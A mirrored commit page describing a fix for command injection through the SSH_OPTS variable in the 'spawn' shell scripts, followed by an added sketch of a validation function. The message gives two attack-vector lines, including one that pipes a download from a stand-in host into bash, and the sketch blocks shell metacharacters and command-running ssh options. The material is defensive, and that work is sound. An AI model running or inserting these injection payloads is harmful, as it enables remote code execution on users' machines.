Mirror of https://github.com/OpenRouterTeam/spawn.git

Synced 2026-05-07 17:31:04 +00:00
HIGH severity fix for command injection vulnerability.

The SSH_OPTS environment variable was used unquoted in multiple ssh/scp commands throughout the codebase. While intentionally unquoted to allow multiple options, this created a command injection risk if an attacker could control the SSH_OPTS environment variable.

Attack vector:

    export SSH_OPTS="-o ProxyCommand='bash -c whoami'"; ./cloud/agent.sh
    export SSH_OPTS="; curl evil.com | bash #"; ./cloud/agent.sh

Impact: Remote code execution on the user's machine when running any spawn script with a malicious SSH_OPTS value.

Fix: Added _validate_ssh_opts() function that blocks shell metacharacters (; | & \` $ ( ) < >) in SSH_OPTS. If validation fails, secure defaults are used instead.

Tested validation against:

- Semicolon injection (;)
- Pipe injection (|)
- Backtick injection (\`)
- Command substitution ($())
- Background execution (&)
- Redirection (< >)

Files changed:

- shared/common.sh: Added validation function and enforcement

Agent: security-auditor

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>

||
|---|---|---|
| common.sh | ||
| github-auth.sh | ||
| key-request.sh | ||
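
A sketch of the kind of check the commit message describes, written as an added example: it is not the project's `_validate_ssh_opts()`, and the function names and the fallback option string are assumptions. The second check goes beyond the commit message: options such as ProxyCommand make ssh run a local command without using any of the listed metacharacters, so the sketch rejects them by name.

```shell
#!/bin/sh
# Added example, not code from the spawn repository.
# Function names and SAFE_SSH_OPTS are hypothetical.

# Fallback used when the supplied value is rejected (assumed defaults).
SAFE_SSH_OPTS="-o StrictHostKeyChecking=accept-new -o BatchMode=yes"

# Return 0 only if the value contains none of the metacharacters the
# commit message lists: ; | & ` $ ( ) < >
has_no_shell_metachars() {
    case "$1" in
        *';'*|*'|'*|*'&'*|*'`'*|*'$'*|*'('*|*')'*|*'<'*|*'>'*) return 1 ;;
        *) return 0 ;;
    esac
}

# Return 0 only if the value names no ssh option that executes a local
# command. ssh option keywords are case-insensitive, so compare lowercased.
# "localcommand" also matches PermitLocalCommand.
has_no_exec_options() {
    lowered=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    case "$lowered" in
        *proxycommand*|*localcommand*|*knownhostscommand*) return 1 ;;
        *) return 0 ;;
    esac
}

# Print the options to use: the caller's value if it passes both checks,
# otherwise the secure defaults.
effective_ssh_opts() {
    if has_no_shell_metachars "$1" && has_no_exec_options "$1"; then
        printf '%s' "$1"
    else
        printf '%s' "$SAFE_SSH_OPTS"
    fi
}

# Constructed sample values, checked only when run with the argument "demo".
if [ "${1:-}" = "demo" ]; then
    for candidate in "-o ConnectTimeout=10" "; echo injected #" \
                     "-o ProxyCommand='bash -c whoami'"; do
        printf '%-40s => %s\n' "$candidate" "$(effective_ssh_opts "$candidate")"
    done
fi
```
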